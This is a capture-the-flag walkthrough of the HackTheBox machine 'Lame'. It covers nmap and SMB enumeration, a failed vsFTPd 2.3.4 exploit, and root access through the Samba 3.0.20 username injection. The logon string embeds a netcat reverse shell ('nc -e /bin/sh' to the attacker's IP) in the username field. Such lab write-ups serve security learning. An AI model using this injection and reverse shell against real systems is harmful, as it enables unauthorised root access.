Lame is an easy-rated Linux machine from HackTheBox created by ch4p. This machine has no mystery, which is suitable for practice. In this case, you find something and search for that exploit. In the current post, my IP is 10.10.14.49, and the target’s IP is 10.129.223.149
Copy nmap -p- --open -T5 -v -n 10.129.223.149 -oG AllPorts
From here, we have FTP, SMB and NetBios Session Service, nothing about a website. Copy nmap -sCV -p 21,22,139,445,3632 10.129.223.149 -oN Target
Port 21 Anonymous allowed and the version is included, vsFTPd 2.3.4, perfect, we will search about that. And the port 139 is another SMB but from a different workgroup.
Copy ftp 10.129.223.149 # user : anonymous , pass : anonymous
Hey, there is nothing inside! Copy crackmapexec smb 10.129.223.149
smbmap -H 10.129.223.149
Look! There is an entrance at tmp, we should use that. Copy smbclient -L 10.129.223.149 -N
Fail, but this is a client-side error. Copy smbclient //10.129.223.129/tmp -N
And we can’t login with null?
Exploitation
At this point we have the following information, an Port 21 FTP vsFTPd 2.3.4, Port 139 SMB (unknown version) and Port 445 SMB (3.0.20)
Search: vsFTPd 2.3.4 exploit
Copy git clone https://github.com/ahervias77/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
batcat vsftpd_234_exploit.py
So, those are the instruction. Copy python3 vsftpd_234_exploit.py 10.129.223.149 21 whoami
It doesn’t works, let’s try with other way At https://www.exploit-db.com/ search for Samba 3.0.20 (Windows issue), and download the exploit from https://www.exploit-db.com/exploits/16320
The exploit only connects to SMB and use a long string as username, and we know that the SMB has an unknown version. As we can see, the payload is a terminal command, maybe we can change that part to create a reverse shell. Copy smbclient //10.129.223.149/tmp -N --option='client min protocol=NT1'
logon "/=`nohup nc -e /bin/sh 10.10.14.49 443 `"
Now your TermA is target root [Root] As you can see, we are connected as root, so we can get both flags directly.
Copy script /dev/null -c bash
cat /home/makis/user.txt
cat /root/root.txt
Last updated 7 months ago